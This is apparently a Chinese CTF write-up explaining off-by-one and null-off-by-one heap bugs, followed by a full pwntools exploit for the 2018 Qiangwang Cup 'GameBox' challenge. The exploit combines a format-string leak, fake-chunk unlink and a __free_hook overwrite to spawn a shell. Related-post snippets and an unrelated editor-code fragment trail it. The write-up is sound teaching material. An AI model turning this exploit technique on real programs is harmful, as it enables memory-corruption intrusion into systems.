堆上的off-by-one+unlink

最新推荐文章于 2024-04-02 00:20:55 发布
最新推荐文章于 2024-04-02 00:20:55 发布
阅读量547 收藏 4
点赞数
分类专栏: 漏洞挖掘与利用 文章标签: ctf、pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41252520/article/details/100166713
版权

off-by-one

  • 由于对字符串长度校验不恰当,导致写入数据的时候多写了一个字节,这种情况就叫做 off-by-one
  • 正所谓一个巴掌拍不响, off-by-one 也是,必须要结合其他的漏洞或者程序的具体实现才能真正构成威胁
  • off-by-one 有两种形式:

(1)多写入一个任意字节,示例代码:

for(int i=0;i<=len;i++){
	read(0,buf[i],1);
}

(2)越界写入一个 NULL ,此又称做—— null-off-by-one ,示例代码:

int i;
for(i=0;i<len;i++){
	read(0,buf[i],1);
}
buf[i]='\0';
  • 利用 off-by-one 一般能够实现:

(1) 堆交叉
(2) unlink

  • 相对于使用 堆溢出 来实现 unlinknull-off-by-one 较为复杂。因为它会破坏堆的结构,所以在利用的时候还需要修复,后面会有一个例题。
  • 32位(64位) 下,堆的大小是以 8(16) 字节对齐。例如,申请的是 0x24(0x28),则实际会分配 0x20 大小,多出来的 4(8) 字节由下个 chunk->prev_size 提供。因此如果存在 off-by-one,我们想利用它,一般都会分配 不对齐的 大小。

例题:强网杯2018-GameBox

在这里插入图片描述

  • 存在 off-by-one 漏洞,分别在 添加编辑 操作中。
    在这里插入图片描述
  • 还存在 格式化字符串漏洞 ,在 输出 操作中。
    在这里插入图片描述
  • 另外令人反感的就是要想进入 添加 操作,还得猜 cookie
    在这里插入图片描述
  • 如果要进行 编辑删除 操作还得先输入之前猜解出来的 cookie,每一个 chunk 对应着不同的cookie
  • 这里直接使用了 rand,之前并没有 srand,因此 cookie 都是可以预测的,但是要注意的是, python 的随机数和 C/C++ 的随机数生成算法不同,所以这里需要用到 C的部分代码。
  • 我们可以编写一个 DLL,然后用 pythonctypes 来加载。
现在来说说怎么利用 off-by-one

  • 因为开启了 PIE ,所以我们要泄露出 PIE 的基址,另外还有 libc 的基址,可以用 格式化字符串漏洞 来实现。

  • 申请一个 chunk,可以从栈中找到相关数据的偏移。

      Add(0x20,'%13$paaaa%9$p')#0
  Show()
  p.recvuntil('0:')
  libc_addr=int(p.recvuntil('a'*4,drop=True),16)-240-libc.sym['__libc_start_main']
  free_hook=libc.sym['__free_hook']+libc_addr
  system=libc.sym['system']+libc_addr
  pie=int(p.recvuntil('=',drop=True),16)-0x18d5

  • 再申请3个 chunk

      Add(0x108,'a'*8)#1
  Add(0x100,'b'*8)#2
  Add(0x30,'/bin/sh')#3

  • 这里有必要说明一下 chunk2 的大小一定要大等于 0x100,因为这里的 off-by-one 会把 next chunk->size 最低一个字节覆盖成 0

  • 然后按照常规的伪造方法

      pay=p64(0)+p64(0x101)+p64(box_list-0x18)+p64(box_list-0x10)+'a'*(0x100-0x20)+p64(0x100)
  Edit(1,1,pay)

  • 注意:box_list的选取最好是你free掉的那个指针所在的地址,这样不容易出错。

  • 此时我们发现堆块被破坏了:
    在这里插入图片描述

  • 没了 chunk3top chunk 。原因是原本的 addr=0x55e7b5fa9150,size=0x110 ,我们现在需要修复它。
    在这里插入图片描述

  • 通过观察内存的分布,我们要修改 chunk3size=0x55e7b5fa9260-0x55e7b5fa9150-0x100=0x10,即 chunk3-chunk2-0x100

      pay='c'*(0x100-0x10)+p64(0)+p64(0x11)
  Edit(2,2,pay)

  • 修改之后,堆结构恢复了正常:
    在这里插入图片描述

  • 此时我们 freechunk2 即可实现 unlink ,后面就可以任意地址写了。我将 free_hook 改写为 system

      Del(2,2)
  Edit(1,1,'a'*0x18+p64(free_hook))
  Edit(1,1,p64(system))
DLL 编写
#include<stdlib.h>

int Random(){
	return rand();
}
//使用 gcc rand.c -fpic -shared -o libcrandom.so 命令生成 DLL
完整的EXP
from pwn import*
import ctypes
#context.log_level='debug'
func=ctypes.CDLL('./libcrandom.so')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p=process('./GameBox')
list_cookies=[]
def Guess():
    r=''
    for i in range(24):
        r+=chr(func.Random()%26+ord('A'))
    return r

def Add(size,name):
    p.sendlineafter('xit\n','P')
    g=Guess()
    list_cookies.append(g)
    p.sendlineafter('write:\n',g)
    p.sendlineafter('length:\n',str(size))
    p.sendlineafter('name:\n',name)
def Show():
    p.sendlineafter('xit\n','S')
def Del(idx,c_id):
    p.sendlineafter('xit\n','D')
    p.sendlineafter('index:\n',str(idx))
    p.sendlineafter('Cookie:\n',list_cookies[c_id])
def Edit(idx,c_id,name):
    p.sendlineafter('xit\n','C')
    p.sendlineafter('index:\n',str(idx))
    p.sendlineafter('Cookie:\n',list_cookies[c_id])
    p.sendlineafter('):\n',name)

Add(0x20,'%13$paaaa%9$p')#0
Show()
p.recvuntil('0:')
libc_addr=int(p.recvuntil('a'*4,drop=True),16)-240-libc.sym['__libc_start_main']
free_hook=libc.sym['__free_hook']+libc_addr
system=libc.sym['system']+libc_addr
pie=int(p.recvuntil('=',drop=True),16)-0x18d5
success('libc_addr:'+hex(libc_addr))
success('free_hook:'+hex(free_hook))
success('system:'+hex(system))
success('pie:'+hex(pie))
box_list=pie+0x203130
success('box_list:'+hex(box_list))
Add(0x108,'a'*8)#1
Add(0x100,'b'*8)#2
Add(0x30,'/bin/sh')#3
pay=p64(0)+p64(0x101)+p64(box_list-0x18)+p64(box_list-0x10)+'a'*(0x100-0x20)+p64(0x100)
Edit(1,1,pay)
pay='c'*(0x100-0x10)+p64(0)+p64(0x11)
Edit(2,2,pay)
Del(2,2)
Edit(1,1,'a'*0x18+p64(free_hook))
Edit(1,1,p64(system))
Del(3,3)
p.interactive()

总结

  • 在利用null-off-by-one 实现 unlink 时要注意修复被破坏的堆结构。
  • 需要分配不对齐的大小才能利用存在的 off-by-one 漏洞。
  • null-off-by-one 会修改 next chunk->size 的最低一个字节为 0,因此需要分配的大小大于等于 0x100
  • python 的随机数算法与 C/C++ 不一致。
快速入门堆溢出技巧(OFF BY ONE)
wulanlin的博客
01-11 691
OFF BY ONE 所谓OFF BY ONE就是利用堆溢出一个字节到下一个堆块,使得目前堆块与下一堆块合并成一个堆块,此时堆块的大小就是我们溢出的那一字节 并且堆块的fd(前驱指针)以及bk(后继指针)都会指向 main_arena+88的地址这也是我们泄露出来的地址 利用gdb 输入libc查看基地址,main_arena+88-libc=offset UNSORTERBIN&FASTBINS 在堆块的bins中分为fastbins,largebins,smallbins还有今天要用
堆溢出 Off-By-One 原理学习
prettyX的博客
04-11 2394
Off-By-One 严格来说,off-by-one是一种特殊的溢出漏洞,off-by-one指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。 off-by-one,是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,也不排除写入的size正好就只多了一个字节的情况。 一般认为,单字节溢出是难以利用的,但是因为Linux的堆管理机制ptmalloc验证的松散性,基于Linux堆的off-by-one漏洞利用起来并不复杂,并且威力强大...
CTF-PWN-heap (off-by-one+unlink+malloc_hook利用)
SuperGate的博客
12-02 912
程序综述 [*] '/home/supergate/Desktop/Pwn/pwn1' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开。 IDA查看后发现是一个菜单题,主...
CTF(pwn)堆利用 之 off by one
半岛铁盒的博客
07-01 309
简介 利用思路
堆溢出----Off-By-One
qq_42192672的博客
10-22 3802
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/off_by_one/#_5 off-by-one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节,emmm 看一下CTFWIKI给的第一个例子(循环边界) int my_gets(char *ptr,int size) { i...
pwn-堆溢出off-by-one
CharlesGodX的博客
04-17 1923
Thunder_J@Thunder_J-virtual-machine:~/桌面$ python exp.py [+] Starting local process './Storm_note': pid 16030 [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/Storm_note' Arch: amd64-64-little ...
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1236
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
off-by-one漏洞的利用
weixin_44864859的博客
07-21 1611
介绍 严格来说 off-by-one 漏洞是一种特殊的溢出漏洞,off-by-one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。 漏洞原理 off-by-one 是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,当然也不排除写入的 size 正好就只多了一个字节的情况。其中边界验证不严通常包括 使用循环语句向堆块中写入数据时,循环的次数设置错误(这在 C 语言初学者中很常见)导致多写入了一个字节。 字符串操作不合适 一般来说,
学习打卡2:off-by-null
一点涵的博客
09-08 913
督促自己:2020-9-8 学习笔记: 《逆向工程权威指南上》12: 指令集架构:x86指令集架构(ISA),opcode长度不同;ARM指令集架构(精简指令集RISC),opcode相同,机器码都封装在4个字节里面(ARM模式),或封装在2个字节里面(Thumb模式) x/86: 函数返回值在eax中 使用“栈”结构存储上述返回地址 ARM: 使用LR寄存器存储函数结束的返回地址 BX LR 指令的作用就是跳转到返回地址 MIPS: 寄存器命名方式有两种:数字命名($0 ~ 31)和伪名称命名(
PWN · heap | Off-By-Null | UAF | Fastbin-attack | Unsortedbin-leak | hook劫持】[攻防世界] babyheap
Mr_Fmnwon的博客
04-02 785
【攻防世界】的本题,所给libc版本错误,经过测试,版本为:libc6_2.23-0ubuntu9_amd64.so当然,本地调试玩玩,用glibc-all-in-one的2.23-0ubuntu3_amd64也是可以的。这题学到了很多知识点(主要是这些知识点整合应用在一起)离不开这些优秀的博客和大佬ha1vk攻防世界PWN之Babyheap(null off by one)题解PLpa、攻防世界(pwn)babyheap(一些常见的堆利用方法)攻防世界-babyheap解题思路-优快云博客。
堆的off-by-one
爱党人士
10-18 363
单字节溢出 产生环境: 1.不注意数组长度,循环次数不注意 2,字符串操作失误,如:忘记字符串在你输入后会加上’\x00’来截断 产生的影响: 虽然只能覆盖掉一个字符,但也能发挥强大的威力。 就从null-off-by-one开始看。 那么该如何利用呢? chunk overlapping unlink触发(unlink的话还没搞懂,懂了再写一遍说说) 关于chunk overlappin...
Off-By-One
abelxu
11-09 1497
0x01 原理 严格来说 off-by-one 漏洞是一种特殊的溢出漏洞,off-by-one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。off-by-one的产生往往和字符串操作有关。如strlen计算长度时,不会计算最后的“0字节”(\x00)。循环读入时,<写成了<=。 0x02 利用思路 溢出字节为可控制任意字节: 通过修改下一个堆块的size造成块结构之间出现重叠,从而泄露其他块数据,或是覆盖其他块数据。也可使用 NULL 字节溢出的方
sctf_2019_easy_heap(off by nullunlink造成doublefree)
m0_51251108的博客
11-18 515
sctf_2019_easy_heap: 保护全开 程序分析: 给我们mmap了一段可读可写可执行的区域,还告诉了我们地址 add里告诉了我们堆地址 其他都挺常规的,delete也释放干净了 漏洞分析: 有个off by null 利用思路: 1.利用漏洞off-by-null造成unlink合并,再申请回来,指针数组里就有两个指针指向同一块地方,我们delete两次就造成了doublefree 2.我们用doublefree往mmap的地方写shellcode 3.再用off-by-null造成unl
高版本libc_off_by_null(一看就懂)
qq_41683953的博客
03-16 2224
在libc2.29之后新增保护,区别与普通的off_by_null会判断pre_size和要合并的chunk_size是否相同普通的off_by_null只需要修改pre_inuse和pre_size即可完成重叠但是现在需要修改前一个的chunk_size这个显然不可能,那就只能自己伪造chunk。
好好说话之off-by-one
hollk’s blog
08-24 6868
从这篇开始就进入堆的范围了,又是两万字”小论文“,关于堆的相关知识请参考wiki上的章节。博主直接讲做堆的技巧,这篇讲off-by-one,也是踩了很多的坑。这篇文章因为写的比较详细,所以会很长,如果有忘记的知识点请翻阅目录查看。感谢在学习中帮助过我的大佬们:NoOne、povcfe
堆入门-Off-By-One
一筐萝卜的博客
06-11 4369
个人技术博客:www.radishes.top 初识 堆是动态分配的,只有在程序中需要时才会分配 程序虚拟地址空间的一块连续的线性区域 堆的生长方向是从低地址向高地址生长的,而栈是从高地址向低地址生长的 堆的基本操作 分配 extern void *malloc(unsigned int num_bytes); 头文件 :stdlib.h void* 表示未确定的指针,可以指向任何类型的数...
Linux 二进制漏洞挖掘入门系列之(二)堆溢出:off-by-one
个人笔记
12-22 1417
0x1 pwntools
off by one
qq_52126646的博客
04-09 442
off by one 感谢hollk师傅 参考:好好说话之off-by-one_hollk的博客-优快云博客 ​ yichen的信安知识库 · 语雀 (yuque.com) ​ 攻防世界PWN之Babyheap(null off by one)题解_ha1vk的博客-优快云博客 ​ 什么是off by one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。 off-by-one这种漏洞的形成和整形溢出很相似,往往都是由于对边界的检查不够严谨,当然也不排除
计算机系统中的Off-by-One Bug:解析与实例
m0_72410588的博客
08-31 517
Off-by-One Bug是一类常见但容易忽视的错误,它可能导致程序崩溃、数据损坏甚至安全漏洞。了解Off-by-One Bug的概念、原因和实例,掌握避免和修复这类bug的方法,对于提高代码质量和软件可靠性具有重要意义。在开发过程中,我们应该注重细节,审慎处理边界条件,以确保软件的正确运行。
'use strict'; /** +------------------------------------------------------------------------------------+ + iceEditor(富文本编辑器) +------------------------------------------------------------------------------------+ + iceEditor v1.1.9 * MIT License By iceui.cn + 作者:ice + 官方:iceui.cn + 时间:2021-06-23 +------------------------------------------------------------------------------------+ + 版权声明:该版权完全归iceUI官方所有,可转载使用和学习,但请务必保留版权信息 +------------------------------------------------------------------------------------+ + iceEditor是一款简约风格的富文本编辑器,体型十分娇小,无任何依赖,整个编辑器只有一个 + 文件,功能却很不平凡!简约的唯美设计,简洁、极速、使用它的时候不需要引用jQuery、font + css……等文件,因为整个编辑器只是一个Js,支持上传图片、附件!支持添加音乐、视频! +------------------------------------------------------------------------------------+ */ var ice = ice || {}; ice.editor = function (id,callback) { class iceEditor { constructor(id) { //------------------------参数配置 开始------------------------ // 工具栏菜单 this.menu = [ 'backColor', 'fontSize', 'foreColor', 'bold', 'italic', 'underline', 'strikeThrough', 'line', 'justifyLeft', 'justifyCenter', 'justifyRight', 'indent', 'outdent', 'line', 'insertOrderedList', 'insertUnorderedList', 'line', 'superscript', 'subscript', 'createLink', 'unlink', 'line', 'hr', 'face', 'table', 'files', 'music', 'video', 'insertImage', 'removeFormat', 'paste', 'line', 'code' ]; // 不需要的工具栏菜单 this.notMenu = []; // 文字背景颜色 this.backColor = [ '#ffffff', '#000000', '#eeece1', '#1f497d', '#4f81bd', '#c0504d', '#9bbb59', '#8064a2', '#4bacc6', '#f79646', '#f2f2f2', '#979797', '#ddd9c3', '#c6d9f0', '#dbe5f1', '#f2dcdb', '#ebf1dd', '#e5e0ec', '#dbeef3', '#fdeada', '#d8d8d8', '#595959', '#c4bd97', '#8db3e2', '#b8cce4', '#e5b9b7', '#d7e3bc', '#ccc1d9', '#b7dde8', '#fbd5b5', '#bfbfbf', '#3f3f3f', '#938953', '#548dd4', '#95b3d7', '#d99694', '#c3d69b', '#b2a2c7', '#92cddc', '#fac08f', '#a5a5a5', '#262626', '#494429', '#17365d', '#366092', '#953734', '#76923c', '#5f497a', '#31859b', '#e36c
最新发布
03-15
假设我们需要构建一个博客发布页面,在该页面上集成 iceEditor 来让用户撰写内容。HTML 结构如下所示: ```html <div id="editor"></div> ()">提交 function submitContent() { const content = editor....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值